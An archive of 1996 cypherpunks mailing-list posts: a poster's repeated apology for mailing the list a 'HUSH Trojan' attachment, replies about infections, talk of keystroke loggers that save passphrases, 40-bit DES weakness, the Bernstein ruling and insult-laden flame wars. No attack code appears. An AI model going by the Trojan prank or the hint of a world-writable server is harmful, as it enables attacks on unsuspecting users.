>The file you received was the HUSH Trojan, of course it was Encrypted using
Cryptcom of Nowhere Man and ICE. So ITS NOT A VIRUS!
>I am not proud of what i did, but if i can get you to gain knowledge (NEVER
RUN FILES ATTACHED TO AN EMAIL) i would do it no matter what.
>Dont say i didn't warn you (fuck@yourself.up)
>Hey guys! No hard feelings ok. Sorry. i feel bad. need a doctor.
>
>******** You can email the next address: AVSECURE@HOTMAIL.COM *****************
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thanks@yourself.up
Date: Wed, 18 Dec 1996 23:14:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you all for the help.
Message-ID: <199612190713.XAA15422@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Thanks@yourself.up
>Subject: Thank you all for the help.
>
>RareTrip
>Mexico Baja California Norte Ensenada
>-I think, therefore i am.- <---Sorry you didn't do it
>
>The file you received was the HUSH Trojan, of course it was Encrypted using
Cryptcom of Nowhere Man and ICE. So ITS NOT A VIRUS!
>I am not proud of what i did, but if i can get you to gain knowledge (NEVER
RUN FILES ATTACHED TO AN EMAIL) i would do it no matter what.
>Dont say i didn't warn you (fuck@yourself.up)
>Hey guys! No hard feelings ok. Sorry. i feel bad. need a doctor.
>
>******** You can email the next address: AVSECURE@HOTMAIL.COM *****************
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thanks@yourself.up
Date: Wed, 18 Dec 1996 23:15:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Thank you all for the help.
Message-ID: <199612190713.XAA15424@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


>To: cypherpunks@toad.com
>From: Thanks@yourself.up
>Subject: Thank you all for the help.
>
>RareTrip
>Mexico Baja California Norte Ensenada
>-I think, therefore i am.- <---Sorry you didn't do it
>
>The file you received was the HUSH Trojan, of course it was Encrypted using
Cryptcom of Nowhere Man and ICE. So ITS NOT A VIRUS!
>I am not proud of what i did, but if i can get you to gain knowledge (NEVER
RUN FILES ATTACHED TO AN EMAIL) i would do it no matter what.
>Dont say i didn't warn you (fuck@yourself.up)
>Hey guys! No hard feelings ok. Sorry. i feel bad. need a doctor.
>
>******** You can email the next address: AVSECURE@HOTMAIL.COM *****************
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sorry@lame.guys
Date: Wed, 18 Dec 1996 23:15:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: Info about FUCK@YOURSELF.UP
Message-ID: <199612190713.XAA15427@telnor.net>
MIME-Version: 1.0
Content-Type: text/plain


Ok, you better sleep nicely cause i would never again Post nothing to this
list. Sorry again. Sincerely *RareTrip*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Internaut <unde0275@frank.mtsu.edu>
Date: Wed, 18 Dec 1996 22:19:04 -0800 (PST)
To: "'Vincent Padua'" <mrosen@peganet.com>
Subject: RE: The virus I got...
Message-ID: <01BBED42.25E4D9C0@s10-pm08.tnstate.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


From: 	Mark Rosen[SMTP:mrosen@peganet.com]
Sent: 	Wednesday, December 18, 1996 04.37 PM
>Oh, and as far as I know, no virus was installed,
>though you should check for one just for good measure.
 
There was one, though I don't remember what it's name was. Maby it was Monkey. I already deleted it. --Internaut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 19 Dec 1996 00:27:08 -0800 (PST)
To: cypherpunks@toad.com
Subject: Password Keystroke Snarfer Programs
Message-ID: <1.5.4.32.19961219082542.003d493c@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Several articles on the PGP-users mailing list have discussed
keystroke snarfers that unexpectedly grab and save keystrokes,
including passwords, severely weakening any benefits from encryption.
taoboy <taoboy@sprynet.com> mentioned Mac programs FileGuard and 
HiddenOasis and the SpellCatcher spell-check program's Ghostwriter feature,
which he'd noticed had stuck his password into a disk file;
he suggests that Windows machines probably have similar surprises.

From: patm@connix.com (Pat McCotter)
> Which is why, every once in a while, I do a search of my entire disk for my
> PGP pass phrase and various other passwords I use. [....] I do this with
> Norton DiskEditor.  I have to upgrade to do this on my Win95 machine which I
> understand is much worse than Win3.x in this area.

Be careful - PGP goes to a lot of effort to overwrite your passphrase
when it's done using it; Norton or grep or other disk-crawlers are unlikely
to do so, because that sort of paranoia's not part of their job,
and simply typing in a command in a command window will often get it saved
in a command history file.  So your search for the passphrase on disk makes it
_more_ likely that some program will stash it on your disk...
You could work around this by using a complex passphrase and adding a 
distinctive word to the end, e.g. "mumblefrotz foobaroid zarquon FINDTHIS",
which doesn't become much less secure if the FINDTHIS gets left on the disk
from your "grepemall FINDTHIS c:" command.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#     (If this is a mailing list, please Cc: me on replies.  Thanks.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Thu, 19 Dec 1996 04:14:54 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Proof that "cypher punks" have complete degenerated...
In-Reply-To: <isqiyD7w165w@bwalk.dm.com>
Message-ID: <32B8C36E.23A9@best.com>
MIME-Version: 1.0
Content-Type: text/plain


It wasn't worth commenting on.
Appending data after the ctrl-Z as stego?
Not even worth a letter to the ed!

Dr.Dimitri Vulis KOTM wrote:
> 
> No one even commented on the latest Dr. Dobbs issue.
> 
> ---
> 
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Johnson <toto@sk.sympatico.ca>
Date: Thu, 19 Dec 1996 05:07:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Pretty Lousy Privacy
In-Reply-To: <1.5.4.32.19961217131004.006a82e4@pop.pipeline.com>
Message-ID: <32B94EE7.2593@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


John H West wrote:
> Are Dr DVT & Ray Arachelian the same pair who relentlessly
> spammed the Net about three years ago re:  what Turkey did
> to the Armenians circa 1918 ??

John,
  Dr. DVT is the spammer.  Ray Arachelian is a spammee.

> PS:  Will PLP be shareware or proprietary ?

  It will be improtietary.
-- 
Reply to:toto@sk.sympatico.ca
"There's only one two."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamie@comet.net (jamie dyer)
Date: Thu, 19 Dec 1996 03:39:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Mr. throw@yourself.up
Message-ID: <Pine.BSF.3.95.961219063436.2319D-100000@atlas.comet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

He's some little turd at telnor.net. Probably
rex@telnor.net
 Throw ftp://ftp.telnor.net/pub/firewall/downloaders.HTM
into your favorite browser. The ftp server is world writable too.
 Fuckin' IRC scum. 
 Oh yeah.
 Merry Christmas.


jamie
- ------------------------------------------------------------------------------
jamie@comet.net |          Comet.Net		|  Send empty message 
		|     Charlottesville, Va.  	|  to pgpkey@comet.net 
		|        (804)295-2407		|  for pgp public key.
	        |     http://www.comet.net	|
"When buying and selling are controlled by legislation, the first things
to be bought and sold are legislators"  -P.J. O'Rourke. 
- ------------------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMrkpX/MDfTuunU79AQEeogf+Lq4bmq3klEUXHyMAozReqBJgX55AshYs
SKh+dZUSEd4kXGM2zDbApLyO8htzxVlpMfcql8ra//9S55OqIOrI3EaVlm3MJ1jt
q0oBLM93SNPUmExVAiR38LEybPi7m8qWpfPj6xQUrt20Jlh3FG1aZJJW0JxW1vHP
QwsZCbp2QKifCYA+ej404HdsVjfPoC/IyTcZ/QTi5BOcXMLRbjkfLb3XuVjPfuiE
5wrqqVnXmQpGOp9Pd1yUHvGUYcxKIRBqx23IwaxcIpfONtWsDfTlZixLGZNVOjc8
SJmbOukE+KeOSJRElwrJFuWVTB+qtTyif9qksopmuj6vsCQpbrQ94g==
=aDfS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Dec 1996 07:36:57 -0800 (PST)
To: blanc <blancw@cnw.com>
Subject: Re: permanent invasion of privacy
In-Reply-To: <01BBED36.461F64A0@king1-10.cnw.com>
Message-ID: <32B96006.13B0@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


blanc wrote:
> From:   Dale Thorn, who hasn't a clue
> [on why the cpunks of late haven't discussed children's point of view]:
>         Not lately?  And why is that?

> Don't know, Dale.   Would everyone please send a message to Dale,
> explaining why you haven't been discussing this?

If all you want to be is an asshole, why do you bother with me?
Surely you could pick a more "respected" target, yes?
Looks like you:
1. Don't have anything to do, and
2. Feel insecure, and
3. Feel inferior to me (wonder why), and
4. Don't have any real answers.

> [on the possibility that abused children might be helped by the uses of
> encryption]: How is an abused child going to be helped by encryption?

> Why are you on this list, Dale?

To get non-answers from ignorants like yourself, I guess.

> [on why, as I said, "empathy with children is not borne of government, but
> of a normal state of mind"]:
>         That's just rhetoric.  What normal state of mind?

> Takes one to know one, Dale.

I hope you're saying that I'm not on the same wavelength as you and
*certain* other c-punks.  I feel better already.

> [on going out to alt.philosphy.objectivism to evoke detailed discussions of
> pertinence to his interest in benefitting from government programs]:
>         In other words, if it doesn't offer something for me,
>         the selfish adult, I don't wanna hear it.

> I'm not *obliged* to hear, it Dale.

Yeah, but you're obliged to partake one way or the other.
Ya' know, you and a few other people whine a lot about government
intrusion this or that (when you take your head out of the sand
momentarily), but like selfish little children, you cover your ears
when the news is unpleasant, like that's going to make a difference.

Maybe if you got off your ass and did something worthwhile for society,
things would really change for the better.  But I won't hold my breath.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Dec 1996 07:37:23 -0800 (PST)
To: SHARK <otaner@boun.edu.tr>
Subject: Re: Encryption ?
In-Reply-To: <Pine.A32.3.91.961219132500.5946D-100000@hamlin.cc.boun.edu.tr>
Message-ID: <32B960E3.1E2E@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


SHARK wrote:
> 
> I am a Mathematic student at Bosphorus University in Turkey.
> I am interested in both computer applications and mathematical base of
> encryption.Where can I find this kind of staff on internet.
> Is it necessary to have high level of mathematical background in order to
> deal with encryption??
> 
> By the way Is there any member of this list from Turkey?

There are a lot of NSA people here on cypherpunks, and they try very
hard to control encryption, to make everyone think it is difficult, to
discourage independent inquiry.

That is the main reason they accuse people of being snakeoil vendors,
to discourage people from inquiring about really new ideas, like some
of my ideas for example.

Just so you know....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Thu, 19 Dec 1996 08:13:52 -0800 (PST)
To: cypherpunks@toad.com
Subject: EFF: Bernstein court declares crypto restrictions unconstitutional
Message-ID: <3.0.32.19961219081440.011367cc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


>	COURT DECLARES CRYPTO RESTRICTIONS UNCONSTITUTIONAL
>	    Free Speech Trumps Clinton Wiretap Plan
>
>December 18, 1996
[snip]

This is the best news that I have heard in some time :)

Congrats to John, EFF, Cindy Cohn, and the other counsel for Professor
Bernstein.

I am very much looking forward to seeing that decision...


Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
dec96 issue "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Thu, 19 Dec 1996 09:07:32 -0800 (PST)
To: taoboy <taoboy@sprynet.com>
Subject: passphrase protection (was: Re: [PGP-USERS] Security LeakPrograms)
In-Reply-To: <199612150251.SAA14543@m9.sprynet.com>
Message-ID: <v03100b23aede9b8d556d@[204.179.135.28]>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3949.1071713653.multipart/signed"

--Boundary..3949.1071713653.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

In Reply to the Message wherein it was written:

>I have just in the last few minutes realized how I need to bring attention
>to the security level of my own computer or PGP means NOTHING in terms of
>protection.

Indeed, Floyd: the dirty little secret is that passphrase protection is a more serious weakness than almost any other factor. I don't just mean dictionary attacks: those are way too expensive if you can just grab a text stream saved to an invisible file on an unsuspecting user's net-accessible machine. The new generation of PGP software (3.x) includes several new prompts/enhancements to the passphrase entry process: perhaps subsequent releases could take those even further into the realm of system-level monitoring.

>PZ writes in the manual about the inability to fully wipe, etc.
>when using virtual memory but this problem I just encountered in security
>goes beyond that, I believe.
>I have been installing a Macintosh program, FileGuard, which adds several
>levels of security. I knew about and had used the invisible extension
>HiddenOasis that saves EVERY keystroke made on the machine.

I started doing an informal survey of all key capture utilities (on all platforms) a couple of years back, but there were so few utilities publicly available back then, very few respondents came back at me with items to list.

It occurred to me then that if there _were_ persons trying to grab passphrases from an individual's machine, it would be a significant advantage to have "invisible" keystroke monitors and for all knowledge of the existence of such utilities to remain a closely-guarded secret (from, say, the laptop of an FBI counter-intelligence instructor suspected of selling secrets to foreign agents for a few hundred thousand dollars, or something improbable like that). However, it's not the "good guys" we mainly need to be concerned with: there is a great deal of industrial espionage that needs some sunshine. The viability of personal privacy software in the marketplace is threatened if such utilities spread: as a responsible company protecting both the public's interest and our own company's survival, we need to plan for very sophisticated passphrase attacks and constantly educate users about this danger.

That having been said, this invisible "HiddenOasis" item you mention is a new one to me: I'd like a copy to test in our lab and my interest in hearing about everyone's favorite keycapture utility is rekindled. Maybe my boss will let me devote, oh, about 0.73% of my time to this. ;)

PGP's engineers have already spec'ed out some good defenses against subtle attacks like ion migration (memory burn-in), and with everyone's help (we can't watch every security leak, that's why we need you guys!), we can continue to work up defenses against such wee beasties. Any whistleblowers are also invited to drop a dime: my public key is widely available (even clickable) through the header URL above and we still have anonymous remailers in this country. Nudge-nudge, say no more, etc.

[elided]
>To my surprise as I set user priveledges with FileGuard, I saw a previously
>unnoticed folder far from my root directory called, "Ghostwriter."

This gives new meaning to the term "spook"...

>I rummaged through it and many, most of the files therein (900k of files)
>showed various passwords I had consdered absolutely uncompromised in
>plaintext.

It's quite a shocking feeling to realize what defaults are built into some popular commercial apps, isn't it?  :/  You don't often see "insignificant" items like this get mentioned in any popular reviews either. It could be that even more users out there are ignorant of this issue than there are sysadmins who haven't read up on the SYN attack.

>It turns out that the spell-check program, SpellCatcher  [elided]  created
>these files which (from the manual), "For the Ghostwriter feature, Spell
>Catcher saves a continuous stream of keystrokes to a text file inside the
>SPEL CATCHER FOLDER." The manual does mention disabling Ghostwriter before
>typing a "sensitive password." But offers no way to PERMANENTLY shut this
>feature OFF.   [elided]

If confirmed, this is an absolutely unconscionable design flaw, IMHO.

Anyone who has a specific comment (include URLs if possible), please mail me and put "passphrase protection" somewhere in the subject line.
<"mailto:ddt@pgp.com?subject=passphrase protection">
I'll collect them, filter to our engineers where appropriate and eventually, when we have enough for a decent matrix, I'll either post a summary on our website or write up an informational RFC.

   dave


________________________________________________________________________
Dave Del Torto                                      +1.415.524.6231  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web



--Boundary..3949.1071713653.multipart/signed
Content-Type: application/octet-stream; name="pgp00000.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00000.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
Q29tbWVudDogVmVyYnVtIHNhcGllbnRpIHNhdGlzIGVzdC4KCmlRQ1ZBd1VB
TXJsMitLSEJPRjlLcndEbEFRR1VlZ1ArT04zQVNPVmx4QWlPTmhjVTdpS29q
NGw5OU9JNHNoYkMKU3NoWVc4OGFoUjd0a2pXR3RHTVNRdHhXTHM2N2ZtMXBX
V2F3bmpVNWlBdEdIQVZrUG0xZ3VadENxT0NFWm1wNgpxRG9vaGFBUk1oWVlo
dGpaWTJjaUV3M3MydXZwOE43S1J4dkJ3cmpHdWdXV09YcjRzVGFRd29hT2F6
Y3dRMVhPCjVqTjBLTU40T2ZJPQo9UmxNZQotLS0tLUVORCBQR1AgU0lHTkFU
VVJFLS0tLS0K
--Boundary..3949.1071713653.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 19 Dec 1996 05:33:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: BUY_spy
Message-ID: <1.5.4.32.19961219132943.006a613c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


 12-18-96.

 "Special Chips Off-Load and Speed Encryption Transactions"

    Buy-spy GAK chips from IRE, Rainbow, Atalla, IBM.

 "Clinton administration opposed to encryption bills"

 "Goodlatte to resubmit encryption bill"

    Commerce Department has said it expects to issue rules
    implementing the new Clinton export policy by January 1, 
    1997. [NYT reports final rules are due out December 22.]

 "Method and apparatus for the secure communication of data"

    Patent: An auto-dialer suitable for use as a smart card 
    capable of being acoustically coupled to a telephone and 
    being reprogrammed in response to acoustic signals. A device 
    for generating a set of tones encoded with data.

 "Enciphered file sharing method (Fujitsu)"

    Patent: An enciphered file sharing method adapted to an
    area distributed type data processing system.

 "EMD Encryptor; First 32-Bit desktop utility to provide multiple 
 encryption capabilities for home and corporate computer users 

    Largest encryption key size: 256-bit.

-----

BUY_spy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@pgp.com>
Date: Thu, 19 Dec 1996 09:07:42 -0800 (PST)
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [PGP-USERS] Password Keystroke Snarfer Programs (passphraseprotection)
In-Reply-To: <1.5.4.32.19961219082542.003d493c@popd.ix.netcom.com>
Message-ID: <v03100b27aedeb335e709@[204.179.135.28]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:25 am -0800 12/19/96, Bill Stewart wrote:
>Several articles on the PGP-users mailing list have discussed
>keystroke snarfers that unexpectedly grab and save keystrokes,
>including passwords, severely weakening any benefits from encryption.
[elided]
>From: patm@connix.com (Pat McCotter)
>>Which is why, every once in a while, I do a search of my entire disk [...]
>>with Norton DiskEditor.  [elided]
>
>Be careful - PGP goes to a lot of effort to overwrite your passphrase
>when it's done using it; Norton or grep or other disk-crawlers are unlikely
>to do so, because that sort of paranoia's not part of their job [elided]

Indeed, and any malignant passphrase-snarfer is probably going to
anticipate this counter-attack and scramble the text stream it saves
invisibly so that disk sector searches will be unlikely to pop up your
passphrase. We definitely need to build better defenses against this sort
of thing.

   dave


________________________________________________________________________
Dave Del Torto                                      +1.415.524.6231  tel
Manager, Strategic Technical Evangelism             +1.415.631.0599  fax
Pretty Good Privacy, Inc.                        http://www.pgp.com  web






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Thu, 19 Dec 1996 21:44:05 -0800 (PST)
To: "geeman@best.com>
Subject: Re: Proof that "cypher punks" have complete degenerated...
In-Reply-To: <isqiyD7w165w@bwalk.dm.com>
Message-ID: <32B97685.69BA@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
> It wasn't worth commenting on.
> Appending data after the ctrl-Z as stego?
> Not even worth a letter to the ed!

> Dr.Dimitri Vulis KOTM wrote:
> > No one even commented on the latest Dr. Dobbs issue.

After seeing the initial post, I ran out to get a copy, but they were
all gone.  I find it hard to believe that appending data to a file is
considered stego, even by a commercial publication such as Dr. Dobb's.
Can anyone confirm this?

I wrote an article for them in 1991 (after they printed my PC Computer
Manifesto), and at that time, the editor was really keen on filling in
some of the blanks left by the usual rushes to new compilers etc. that
leave everyone else ignored.

So they started sending me books to review.  After reviewing about six
books, all negatively (the books were crap), they didn't send any more
books, and wouldn't respond further.

I guess at the time their philosophy was something like "Yes, we live
in a world of crap, so, since we have to make a living with this crap,
let's deny that it's crap so we can continue to sell the stuff", etc.
Kinda like *certain* c-punks, who have nothing to say, so they blame
myself or Dr. Vulis for interfering with their degenerate doings on
the c-punks list.

My experience with several such magazines is that when a new editor
comes on board, he/she stirs things up and it's interesting for awhile,
but then the graft kicks in and it all goes downhill.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vangelis <vangelis@qnis.net>
Date: Thu, 19 Dec 1996 09:18:22 -0800 (PST)
To: "geeman@best.com>
Subject: Re: Proof that "cypher punks" have complete degenerated...
In-Reply-To: <isqiyD7w165w@bwalk.dm.com>
Message-ID: <32B97939.55C9@qnis.net>
MIME-Version: 1.0
Content-Type: text/plain


geeman@best.com wrote:
> 
> Appending data after the ctrl-Z as stego?

WHAT?!

Hahahaha.. kill me now!

-- 
Vangelis <vangelis@qnis.net> /\oo/\
Finger for public key. PGP KeyID 1024/A558B025
PGP Fingerprint AE E0 BE 68 EE 7B CF 04  02 97 02 86 F0 C7 69 25
Life is my religion, the world is my altar.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 07:12:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Cypherpunks as Philosopher Kings [was permanent invasion of privacy]
In-Reply-To: <32B8DADE.7C28@gte.net>
Message-ID: <8iu7yD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dale Thorn <dthorn@gte.net> writes:
> I note that the cypherpunks subscriptions are down to 1262 as of 18 Dec.,
> compared to 1299 on 30 Nov., 1353 on 04 Nov., and 1361 on 12 Oct.

Has John Gilmore (spit) been unsuscriving more people? What a jerk.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 07:16:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Earl Edwin Pitts, $224,000
In-Reply-To: <199612190254.SAA18254@mail.pacifier.com>
Message-ID: <Bsu7yD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> >>http://www.cnn.com/US/9612/18/fbi.spy/index.html
> >>FBI agent spied for Soviet Union, Russia.
>
> >>Too bad he didn't have access to the Clipper database.  That would
> >>have helped us find its free market price.
> >
> >...and who's to say he didn't? Anyone who bought it--the Russians, for
> >example--would hardly have been likely to publicize their purchase.
> >
> >(Maybe if _we_ purchased it, we'd publicize the purchase, but nearly anyone
> >else would not.)
>
> Or maybe he could just _claim_ to have sold the database.  That'd work just
> as well, I think.   Think how much trouble the gov't would have to go to do
> disprove him!

Look at the hoops the Klinton administration jumps through to prove that
flight TWA wasn't shot down by their missile.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 07:15:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: "I've Always Wondered..."
In-Reply-To: <Pine.BSF.3.91.961218201509.4293B-100000@mcfeely.bsfs.org>
Message-ID: <s3u7yD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

> On 10 Dec 1996, Secret Squirrel wrote:
>
> >
> > Still, this brings up an interesting point:  Considering the special
> > abilities of many of the principals here, is there something especially
> > tasty in store for those net predators who spam this list?
> >
> > I've always imagined something _very_ special happens to their accounts,
> > but I may just be a hopeless romantic, I dunno...
> >
> > If not, why not?
> >
>
> Even c'punks are busy at times.

He he he. Clearly, "cypher punks" like Paul Bradley, Ray Arachalian, and
Timmy May suffer from too having too much free time.  Idle minds are the
root of sexual perversion or some such.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Kinchlea <security@kinch.ark.com>
Date: Thu, 19 Dec 1996 09:50:52 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Houghton-Mifflin wants spam in exhange for publicity
In-Reply-To: <v03007801aede680f5b7e@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.961219094339.11068E-100000@kinch.ark.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Dec 1996, Timothy C. May wrote:

> 
> Which part was the "excellent idea," falling for the spam of a commercial
> company or copying a long message and only adding the stupid "excellent
> idea" comment?

In defence of my sister, I do not know how she managed to add
cypherpunks to her reply, I certainly didn't send it to the list, but
she has used email for a total of 1 week to date -- shit happens and we
all learn and make mistakes.

As to your point, I disagree completely. While I am quite aware that I
will get email spam because of sending a message to Houghton-Mifflin, it
is worthwhile IMHO. I do believe that they will live up to their
commitments and some kids will get books they otherwise wouldn't. 

I will/do agree that cypherpunks was an inappropriate place to send the
spam to begin with. 

cheers, kinch






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 07:13:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Earl Edwin Pitts, $224,000
In-Reply-To: <v03007800aede52a753c9@[207.167.93.63]>
Message-ID: <06u7yD5w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:
> According to tonight's news reports, he was in charge of
> counterintelligence against the Soviets and then the Russians in the New
> York area. This gave him considerable access to surveillance and crypto
> methods. Note also that James Kallstrom heads up the New York FBI office.
>
> (Maybe he knows some members of this list.)

No shit! I just realized that I think I did meet this guy!!!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mullen Patrick" <Mullen.Patrick@mail.ndhm.gtegsc.com>
Date: Thu, 19 Dec 1996 07:05:26 -0800 (PST)
To: "Internaut" <unde0275@frank.mtsu.edu>
Subject: RE: The virus I got...
Message-ID: <n1361132540.96106@mail.ndhm.gtegsc.com>
MIME-Version: 1.0
Content-Type: text/plain


You already had the Monkey (or whatever) virus.  It was not included in the
file distributed to the list.  The file was a pure Trojan, not infector.

PM

_______________________________________________________________________________
From: Internaut on Thu, Dec 19, 1996 3:30
Subject: RE: The virus I got...

From: 	Mark Rosen[SMTP:mrosen@peganet.com]
Sent: 	Wednesday, December 18, 1996 04.37 PM
>Oh, and as far as I know, no virus was installed,
>though you should check for one just for good measure.
 
There was one, though I don't remember what it's name was. Maby it was Monkey.
I already deleted it. --Internaut






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 19 Dec 1996 07:53:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!
Message-ID: <199612191553.HAA24151@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> From:          Walt Armour <walt@blarg.net>

> Subject:       RE: !! Point 'n Crypt -- Win95 Privacy for Everyone !!

> Security through obscurity is no security at all.
> 
> As for PnC (actually, the scCryptoEngine beneath it), we get the 40 bits 
> from the 56 bits by nulling out the high nybble of every other byte.
> 
> walt
> 
> ----------
> From: 	Peter Trei[SMTP:trei@process.com]

> Would you mind telling us just how you expand the 40 key to the 56
> bits needed for DES? (Security through obscurity has a bad rep on
> this list). For many  methods of doing so, 40bit DES is NOT
> secure against a motivated individual's attack.
> 
> Peter Trei
> trei@process.com

Thanks for being so forthcoming!

There are methods for using 40 bit keys that are a lot better than
this. My contention stands: 50 200MHz Pentiums *WILL* crack this
overnight. A single 100 MHz Pentium will do it in a month. (This
assumes a known plaintext attack in EBC or CBC mode).

Not utterly trivial, but well within the means of a motivated
individual.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 19 Dec 1996 08:11:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Proof that "cypher punks" have complete degenerated...
In-Reply-To: <32B8C36E.23A9@best.com>
Message-ID: <0ay7yD9w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"geeman@best.com" <geeman@best.com> writes:
> It wasn't worth commenting on.

The word "encryption" on the fucking front cover?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 19 Dec 1996 11:40:51 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: EFF: Bernstein court declares crypto restrictions unconstitutiona
